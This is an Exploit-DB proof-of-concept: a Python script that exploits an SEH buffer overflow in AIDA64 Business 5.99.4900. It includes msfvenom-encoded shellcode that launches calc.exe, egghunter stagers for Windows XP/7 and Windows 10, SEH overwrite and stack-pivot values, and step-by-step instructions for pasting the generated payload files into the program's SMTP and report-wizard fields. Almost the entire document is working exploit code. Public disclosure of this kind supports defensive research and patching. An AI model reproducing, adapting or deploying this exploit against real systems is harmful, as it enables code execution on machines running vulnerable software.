AIDA64 Business 5.99.4900 - SEH Buffer Overflow (EggHunter)

EDB-ID:

46639

CVE:

N/A




Platform:

Windows

Date:

2019-04-03


#!/usr/bin/python                                                                                         #
# Exploit Title: AIDA64 Business 5.99.4900 - SEH Buffer Overflow (EggHunter)                              #
# Date: 2019-04-01                                                                                        #
# Vendor Homepage: https://www.aida64.com                                                                 #
# Software Link: https://www.aida64.com/downloads                                                         #
# Mirror Link : https://www.softpedia.com/get/System/System-Info/AIDA64-Business-Edition.shtml            #
# Exploit Author: Peyman Forouzan                                                                         #
# Tested Version: 5.99.4900                                                                               #
# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit             #
# Special Thanks to my wife                                                                               #
# The program has SEH Buffer Overflow in several places.(this code show one of them)                      #
# Note 1 : To optimize code, I've used a "stack pivot" that is the same in                                #
# (Extreme, Engineer, Network Audit) Editions.                                                            #
# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4900                           #
# But the stack pivots in Business Edition are different.                                                 #
# Note 2 : All the old versions of the program that are available on the sites like soft32.com,           #
# or in https://www.aida64.com/downloads/archive                                                          #
# have the same vulnerabily in different offsets (for example version 5.70.3800 )                         #
# Note 3 : this technique (EggHunter) has been used to run vulnerability in different windows versions.   #
# Steps :                                                                                                 #
#  1- Run python code : Aida64-Business.py ( Three files are created )                                    #
#  2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt              #
#         into "Display name" --> Ok                                                                      #
#  3- Report --> Report Wizard ... --> Next --> paste in contents from the egghunter-winxp-win7.txt       #
#     or egghunter-win10.txt (depend on your windows version) into "Load from file" --> Next              #
#     --> Wait a minute --> Shellcode (Calc) open                                                         #
#---------------------------------------------------------------------------------------------------------#

#------------------------------------   EGG Shellcode Generation    ---------------------------------------

bufsize = 292

#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
egg =  "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"

f = open ("egg.txt", "w")
f.write(egg)
f.close()

#----------------------------------   EGG Hunter Shellcode Generation  ------------------------------------
egghunter =  "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29\xf7"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
egghunter += "\x42\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"
egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"
egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"
egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"
egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"
egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"
egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"
egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"
egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"
egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"
egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"
egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"
egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"

egghunter10 =  "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29"
egghunter10 += "\xf7\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
egghunter10 += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
egghunter10 += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"
egghunter10 += "\x41\x42\x75\x4a\x49\x4d\x53\x5a\x4c\x34\x70\x50"
egghunter10 += "\x31\x69\x42\x30\x52\x70\x52\x30\x52\x62\x46\x4e"
egghunter10 += "\x6c\x4a\x6b\x6b\x30\x59\x6b\x76\x43\x44\x35\x54"
egghunter10 += "\x42\x4d\x63\x59\x50\x30\x66\x4b\x31\x59\x5a\x69"
egghunter10 += "\x6f\x56\x6f\x43\x72\x31\x42\x6b\x30\x39\x6b\x6f"
egghunter10 += "\x30\x44\x34\x44\x4c\x48\x38\x64\x7a\x39\x6e\x39"
egghunter10 += "\x6f\x49\x6f\x6c\x37\x4b\x68\x68\x4d\x64\x6e\x72"
egghunter10 += "\x7a\x58\x6b\x47\x61\x54\x71\x4b\x6b\x76\x33\x31"
egghunter10 += "\x43\x76\x33\x50\x6a\x45\x79\x46\x38\x78\x33\x39"
egghunter10 += "\x50\x45\x34\x49\x6f\x46\x73\x4f\x73\x4b\x74\x66"
egghunter10 += "\x6c\x72\x7a\x65\x6c\x46\x65\x54\x34\x5a\x73\x78"
egghunter10 += "\x38\x51\x67\x34\x70\x30\x30\x30\x74\x4b\x39\x78"
egghunter10 += "\x57\x6e\x4f\x42\x55\x48\x4e\x4e\x4f\x74\x35\x5a"
egghunter10 += "\x6b\x69\x6f\x4b\x57\x41\x41"

jmpback = "\xe9\xdc\xfe\xff\xff"  # jmp back
nseh = "\xeb\xf9\x90\x90"         # jmp Short back
seh = "\x50\x15\x40"              # Overwrite Seh - Golden Pivot !! - Works on all Editions

buffer  = egghunter
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))
buffer += jmpback
buffer += nseh
buffer += seh
print "[+] Creating %s bytes payload for winxp and windows 7 ..." %len(buffer)
f = open ("egghunter-winxp-win7.txt", "w")
print "[+] File created!"
f.write(buffer)
f.close()

buffer  = egghunter10
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))
buffer += jmpback
buffer += nseh
buffer += seh
print "[+] Creating %s bytes payload for windows 10 ..." %len(buffer)
f = open ("egghunter-win10.txt", "w")
print "[+] File created!"
f.write(buffer)
f.close()